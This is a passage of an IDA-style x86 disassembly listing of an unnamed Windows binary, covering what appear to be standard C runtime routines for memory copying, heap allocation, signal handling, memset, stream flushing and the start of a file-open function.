mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D86C proc near ; CODE XREF: sub_407370+42�j
; sub_407BF0+42�j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40D8EF
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_40D8C7
sub esi, ecx
push esi
push ebx
push eax
call sub_40D7E5
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_40D8C7: ; CODE XREF: sub_40D86C+46�j
test ecx, ecx
jz short loc_40D942
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D8EF: ; CODE XREF: sub_40D86C+37�j
cmp ecx, edi
jnz short loc_40D928
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40D86C
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D928: ; CODE XREF: sub_40D86C+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_40D942: ; CODE XREF: sub_40D86C+5D�j
; sub_40D86C+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40D86C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D94F proc near ; CODE XREF: sub_40777A+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040DA54 SIZE 00000019 BYTES
push 0Ch
push offset dword_4217E0
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40D992
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40D992
call sub_4057D3
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
loc_40D98B: ; CODE XREF: sub_40D94F+E6�j
; sub_40D94F+F2�j
xor eax, eax
jmp loc_40DA67
; ---------------------------------------------------------------------------
loc_40D992: ; CODE XREF: sub_40D94F+13�j
; sub_40D94F+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40D9A2
xor esi, esi
inc esi
loc_40D9A2: ; CODE XREF: sub_40D94F+4E�j
; sub_40D94F+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40DA15
cmp ds:dword_434DF4, 3
jnz short loc_40DA00
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, ds:dword_434DE4
ja short loc_40DA00
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DA4B
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40DA04
push [ebp+arg_0]
push edi
push ebx
call sub_407B70
add esp, 0Ch
loc_40DA00: ; CODE XREF: sub_40D94F+64�j
; sub_40D94F+78�j
cmp ebx, edi
jnz short loc_40DA65
loc_40DA04: ; CODE XREF: sub_40D94F+A2�j
push esi
push 8
push ds:dword_425F68
call ds:dword_41D114
mov ebx, eax
loc_40DA15: ; CODE XREF: sub_40D94F+5B�j
cmp ebx, edi
jnz short loc_40DA65
cmp ds:dword_4262EC, edi
jz short loc_40DA54
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40D9A2
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40D98B
mov dword ptr [eax], 0Ch
jmp loc_40D98B
sub_40D94F endp
; =============== S U B R O U T I N E =======================================
sub_40DA46 proc near ; DATA XREF: J8@F_7_S:004217F8�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40DA46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DA4B proc near ; CODE XREF: sub_40D94F+98�p
push 4
call sub_40591F
pop ecx
retn
sub_40DA4B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40D94F
loc_40DA54: ; CODE XREF: sub_40D94F+D0�j
cmp ebx, edi
jnz short loc_40DA65
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40DA65
mov dword ptr [eax], 0Ch
loc_40DA65: ; CODE XREF: sub_40D94F+B3�j
; sub_40D94F+C8�j ...
mov eax, ebx
loc_40DA67: ; CODE XREF: sub_40D94F+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40D94F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA6D proc near ; CODE XREF: sub_4077C2+C�p
; sub_40DC88+3E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040DBBA SIZE 000000CE BYTES
push 10h
push offset dword_421800
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40DA8E
push [ebp+arg_4]
call sub_4036E0
pop ecx
jmp loc_40DC5A
; ---------------------------------------------------------------------------
loc_40DA8E: ; CODE XREF: sub_40DA6D+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40DAA1
push ebx
call sub_403603
pop ecx
jmp loc_40DC58
; ---------------------------------------------------------------------------
loc_40DAA1: ; CODE XREF: sub_40DA6D+26�j
cmp ds:dword_434DF4, 3
jnz loc_40DC41
loc_40DAAE: ; CODE XREF: sub_40DA6D+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40DC46
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40DB77
cmp esi, ds:dword_434DE4
ja short loc_40DB2A
push esi
push ebx
push eax
call sub_40601A
add esp, 0Ch
test eax, eax
jz short loc_40DAF5
mov [ebp+var_1C], ebx
jmp short loc_40DB2A
; ---------------------------------------------------------------------------
loc_40DAF5: ; CODE XREF: sub_40DA6D+81�j
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB2A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB0D
mov eax, esi
loc_40DB0D: ; CODE XREF: sub_40DA6D+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
call sub_405B25
mov [ebp+var_20], eax
push ebx
push eax
call sub_405B50
add esp, 18h
loc_40DB2A: ; CODE XREF: sub_40DA6D+72�j
; sub_40DA6D+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_40DB77
cmp esi, edi
jnz short loc_40DB39
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40DB39: ; CODE XREF: sub_40DA6D+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ds:dword_425F68
call ds:dword_41D114
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB77
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB61
mov eax, esi
loc_40DB61: ; CODE XREF: sub_40DA6D+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
push [ebp+var_20]
call sub_405B50
add esp, 14h
loc_40DB77: ; CODE XREF: sub_40DA6D+66�j
; sub_40DA6D+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DBB1
cmp [ebp+var_20], 0
jnz short loc_40DBBA
test esi, esi
jnz short loc_40DB8E
inc esi
loc_40DB8E: ; CODE XREF: sub_40DA6D+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
jmp short loc_40DBBD
sub_40DA6D endp
; =============== S U B R O U T I N E =======================================
sub_40DBAB proc near ; DATA XREF: J8@F_7_S:00421818�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DBB1 proc near ; CODE XREF: sub_40DA6D+111�p
push 4
call sub_40591F
pop ecx
retn
sub_40DBB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DA6D
loc_40DBBA: ; CODE XREF: sub_40DA6D+11A�j
mov edi, [ebp+var_1C]
loc_40DBBD: ; CODE XREF: sub_40DA6D+13C�j
test edi, edi
jnz loc_40DC84
cmp ds:dword_4262EC, edi
jz short loc_40DBF9
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40DAAE
call sub_4057D3
cmp [ebp+var_20], edi
jnz short loc_40DC52
loc_40DBE6: ; CODE XREF: sub_40DA6D+1F8�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
pop ecx
mov [esi], eax
jmp short loc_40DC58
; ---------------------------------------------------------------------------
loc_40DBF9: ; CODE XREF: sub_40DA6D+15E�j
test edi, edi
jnz loc_40DC84
call sub_4057D3
cmp [ebp+var_20], edi
jz short loc_40DC73
mov dword ptr [eax], 0Ch
jmp short loc_40DC84
; ---------------------------------------------------------------------------
loc_40DC13: ; CODE XREF: sub_40DA6D+1D7�j
test esi, esi
jnz short loc_40DC18
inc esi
loc_40DC18: ; CODE XREF: sub_40DA6D+1A8�j
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
test edi, edi
jnz short loc_40DC84
cmp ds:dword_4262EC, eax
jz short loc_40DC6A
push esi
call sub_408062
pop ecx
test eax, eax
jz short loc_40DC60
loc_40DC41: ; CODE XREF: sub_40DA6D+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_40DC13
loc_40DC46: ; CODE XREF: sub_40DA6D+49�j
push esi
call sub_408062
pop ecx
call sub_4057D3
loc_40DC52: ; CODE XREF: sub_40DA6D+177�j
mov dword ptr [eax], 0Ch
loc_40DC58: ; CODE XREF: sub_40DA6D+2F�j
; sub_40DA6D+18A�j
xor eax, eax
loc_40DC5A: ; CODE XREF: sub_40DA6D+1C�j
; sub_40DA6D+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40DC60: ; CODE XREF: sub_40DA6D+1D2�j
call sub_4057D3
jmp loc_40DBE6
; ---------------------------------------------------------------------------
loc_40DC6A: ; CODE XREF: sub_40DA6D+1C7�j
test edi, edi
jnz short loc_40DC84
call sub_4057D3
loc_40DC73: ; CODE XREF: sub_40DA6D+19C�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40DC84: ; CODE XREF: sub_40DA6D+152�j
; sub_40DA6D+18E�j ...
mov eax, edi
jmp short loc_40DC5A
; END OF FUNCTION CHUNK FOR sub_40DA6D
; =============== S U B R O U T I N E =======================================
sub_40DC88 proc near ; CODE XREF: sub_40780D+10�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jbe short loc_40DCBC
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, [esp+4+arg_8]
jnb short loc_40DCBC
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 0Ch
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DCBC: ; CODE XREF: sub_40DC88+9�j
; sub_40DC88+16�j
imul ecx, [esp+4+arg_8]
push ecx
push [esp+8+arg_0]
call sub_40DA6D
pop ecx
pop ecx
pop esi
retn
sub_40DC88 endp
; =============== S U B R O U T I N E =======================================
sub_40DCCF proc near ; CODE XREF: sub_407B19+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426424, eax
mov ds:dword_426428, eax
mov ds:dword_42642C, eax
mov ds:dword_426430, eax
retn
sub_40DCCF endp
; =============== S U B R O U T I N E =======================================
sub_40DCE8 proc near ; CODE XREF: sub_40DD29+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, ds:dword_423E44
push esi
loc_40DCF3: ; CODE XREF: sub_40DCE8+1E�j
cmp [eax+4], edx
jz short loc_40DD08
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40DCF3
loc_40DD08: ; CODE XREF: sub_40DCE8+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40DD19
cmp [eax+4], edx
jz short locret_40DD1B
loc_40DD19: ; CODE XREF: sub_40DCE8+2A�j
xor eax, eax
locret_40DD1B: ; CODE XREF: sub_40DCE8+2F�j
retn
sub_40DCE8 endp
; =============== S U B R O U T I N E =======================================
sub_40DD1C proc near ; CODE XREF: sub_4101BD:loc_4101EA�p
push ds:dword_42642C
call sub_405193
pop ecx
retn
sub_40DD1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD29 proc near ; CODE XREF: sub_4101BD+38�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040DED3 SIZE 00000006 BYTES
push 20h
push offset dword_421820
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_40DD91
jz short loc_40DD5C
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_40DD72
sub eax, ecx
jz short loc_40DD5C
sub eax, ecx
jz short loc_40DDBC
sub eax, ecx
jnz short loc_40DDA0
loc_40DD5C: ; CODE XREF: sub_40DD29+1C�j
; sub_40DD29+29�j
call sub_40531A
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_40DD7E
loc_40DD6A: ; CODE XREF: sub_40DD29+91�j
or eax, 0FFFFFFFFh
jmp loc_40DED3
; ---------------------------------------------------------------------------
loc_40DD72: ; CODE XREF: sub_40DD29+25�j
mov esi, offset dword_426424
mov eax, ds:dword_426424
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DD7E: ; CODE XREF: sub_40DD29+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_40DCE8
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_40DDEB
; ---------------------------------------------------------------------------
loc_40DD91: ; CODE XREF: sub_40DD29+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_40DDD4
sub eax, 6
jz short loc_40DDC8
dec eax
jz short loc_40DDBC
loc_40DDA0: ; CODE XREF: sub_40DD29+31�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
jmp short loc_40DD6A
; ---------------------------------------------------------------------------
loc_40DDBC: ; CODE XREF: sub_40DD29+2D�j
; sub_40DD29+75�j
mov esi, offset dword_42642C
mov eax, ds:dword_42642C
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDC8: ; CODE XREF: sub_40DD29+72�j
mov esi, offset dword_426428
mov eax, ds:dword_426428
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDD4: ; CODE XREF: sub_40DD29+6D�j
mov esi, offset dword_426430
mov eax, ds:dword_426430
loc_40DDDE: ; CODE XREF: sub_40DD29+53�j
; sub_40DD29+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_405193
loc_40DDEB: ; CODE XREF: sub_40DD29+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40DED3
cmp [ebp+var_20], eax
jnz short loc_40DE07
push 3
call sub_407AEA
loc_40DE07: ; CODE XREF: sub_40DD29+D5�j
cmp [ebp+var_1C], eax
jz short loc_40DE13
push eax
call sub_4059F7
pop ecx
loc_40DE13: ; CODE XREF: sub_40DD29+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_40DE27
cmp ebx, 0Bh
jz short loc_40DE27
cmp ebx, 4
jnz short loc_40DE42
loc_40DE27: ; CODE XREF: sub_40DD29+F2�j
; sub_40DD29+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DE75
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40DE42: ; CODE XREF: sub_40DD29+FC�j
cmp ebx, 8
jnz short loc_40DE75
mov ecx, ds:dword_423E38
mov [ebp+var_24], ecx
loc_40DE50: ; CODE XREF: sub_40DD29+14A�j
mov ecx, ds:dword_423E3C
mov edx, ds:dword_423E38
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_40DE7C
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40DE50
; ---------------------------------------------------------------------------
loc_40DE75: ; CODE XREF: sub_40DD29+10A�j
; sub_40DD29+11C�j
call sub_40518A
mov [esi], eax
loc_40DE7C: ; CODE XREF: sub_40DD29+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DE9D
cmp ebx, 8
jnz short sub_40DEAC
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_40DEB0
sub_40DD29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE97 proc near ; DATA XREF: J8@F_7_S:00421838�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_40DE97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE9D proc near ; CODE XREF: sub_40DD29+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_40DEAB
push 0
call sub_40591F
pop ecx
locret_40DEAB: ; CODE XREF: sub_40DE9D+4�j
retn
sub_40DE9D endp
; =============== S U B R O U T I N E =======================================
sub_40DEAC proc near ; CODE XREF: sub_40DD29+162�j
push ebx
call dword ptr [ebp-20h]
loc_40DEB0: ; CODE XREF: sub_40DD29+16C�j
pop ecx
cmp ebx, 8
jz short loc_40DEC0
cmp ebx, 0Bh
jz short loc_40DEC0
cmp ebx, 4
jnz short loc_40DED1
loc_40DEC0: ; CODE XREF: sub_40DEAC+8�j
; sub_40DEAC+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DED1
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40DED1: ; CODE XREF: sub_40DEAC+12�j
; sub_40DEAC+1D�j
xor eax, eax
sub_40DEAC endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40DD29
loc_40DED3: ; CODE XREF: sub_40DD29+44�j
; sub_40DD29+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40DD29
; =============== S U B R O U T I N E =======================================
sub_40DED9 proc near ; CODE XREF: sub_407B19+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426438, eax
retn
sub_40DED9 endp
; =============== S U B R O U T I N E =======================================
sub_40DEE3 proc near ; CODE XREF: sub_407B19+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426444, eax
retn
sub_40DEE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEED proc near ; CODE XREF: sub_40DF44+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_40DF0D
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 90h
; ---------------------------------------------------------------------------
loc_40DF0D: ; CODE XREF: sub_40DEED+16�j
; sub_40DEED+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_40DF0D
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DEED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF44 proc near ; CODE XREF: sub_407B70+27�j
; sub_40DF44+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40DF9E
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_40DF83
sub ecx, edx
push ecx
push eax
call sub_40DEED
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_40DF83: ; CODE XREF: sub_40DF44+2B�j
test edx, edx
jz short loc_40DFCC
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_40DFCC
; ---------------------------------------------------------------------------
loc_40DF9E: ; CODE XREF: sub_40DF44+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_40DF44
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_40DFCC: ; CODE XREF: sub_40DF44+41�j
; sub_40DF44+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFD3 proc near ; CODE XREF: sub_40813B+E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421840
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40DFF2: ; CODE XREF: sub_40DFD3+7F�j
mov [ebp+var_20], edi
cmp edi, ds:dword_434DC0
jge short loc_40E054
mov esi, edi
shl esi, 2
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_40E051
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40E024
push eax
call sub_4034C4
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40E024
inc [ebp+var_1C]
loc_40E024: ; CODE XREF: sub_40DFD3+40�j
; sub_40DFD3+4C�j
cmp edi, 14h
jl short loc_40E051
mov eax, ds:dword_433DA0
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D170
mov eax, ds:dword_433DA0
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
loc_40E051: ; CODE XREF: sub_40DFD3+38�j
; sub_40DFD3+54�j
inc edi
jmp short loc_40DFF2
; ---------------------------------------------------------------------------
loc_40E054: ; CODE XREF: sub_40DFD3+28�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E069
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40DFD3 endp
; =============== S U B R O U T I N E =======================================
sub_40E069 proc near ; CODE XREF: sub_40DFD3+88�p
; DATA XREF: J8@F_7_S:00421858�o
push 1
call sub_40591F
pop ecx
retn
sub_40E069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E072 proc near ; CODE XREF: sub_40E6B0+72�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor ebx, ebx
test byte ptr [ebp+arg_8], 80h
push edi
push 10h
mov esi, eax
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_2], bl
mov [ebp+var_28], 0Ch
mov [ebp+var_24], ebx
pop edi
jz short loc_40E0A4
mov [ebp+var_20], ebx
mov [ebp+var_1], 10h
jmp short loc_40E0AE
; ---------------------------------------------------------------------------
loc_40E0A4: ; CODE XREF: sub_40E072+27�j
mov [ebp+var_20], 1
mov [ebp+var_1], bl
loc_40E0AE: ; CODE XREF: sub_40E072+30�j
lea eax, [ebp+var_14]
push eax
call sub_410889
test eax, eax
pop ecx
jz short loc_40E0C9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0C9: ; CODE XREF: sub_40E072+48�j
lea eax, [ebp+var_18]
push eax
call sub_407906
test eax, eax
pop ecx
jz short loc_40E0E4
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0E4: ; CODE XREF: sub_40E072+63�j
mov eax, 8000h
test [ebp+arg_8], eax
jnz short loc_40E100
test [ebp+arg_8], 74000h
jnz short loc_40E0FC
cmp [ebp+var_14], eax
jz short loc_40E100
loc_40E0FC: ; CODE XREF: sub_40E072+83�j
or [ebp+var_1], 80h
loc_40E100: ; CODE XREF: sub_40E072+7A�j
; sub_40E072+88�j
mov eax, [ebp+arg_8]
push 3
pop edx
and eax, edx
sub eax, ebx
mov ecx, 80000000h
jz short loc_40E14F
dec eax
jz short loc_40E146
dec eax
jz short loc_40E13D
loc_40E117: ; CODE XREF: sub_40E072+F6�j
; sub_40E072+14F�j ...
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
jmp loc_40E5CC
; ---------------------------------------------------------------------------
loc_40E13D: ; CODE XREF: sub_40E072+A3�j
mov [ebp+var_C], 0C0000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E146: ; CODE XREF: sub_40E072+A0�j
mov [ebp+var_C], 40000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E14F: ; CODE XREF: sub_40E072+9D�j
mov [ebp+var_C], ecx
loc_40E152: ; CODE XREF: sub_40E072+D2�j
; sub_40E072+DB�j
mov eax, [ebp+arg_C]
sub eax, edi
jz short loc_40E18E
sub eax, edi
jz short loc_40E185
sub eax, edi
jz short loc_40E17C
sub eax, edi
jz short loc_40E177
sub eax, 40h
jnz short loc_40E117
xor eax, eax
cmp [ebp+var_C], ecx
setz al
mov [ebp+var_8], eax
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E177: ; CODE XREF: sub_40E072+F1�j
mov [ebp+var_8], edx
jmp short loc_40E191
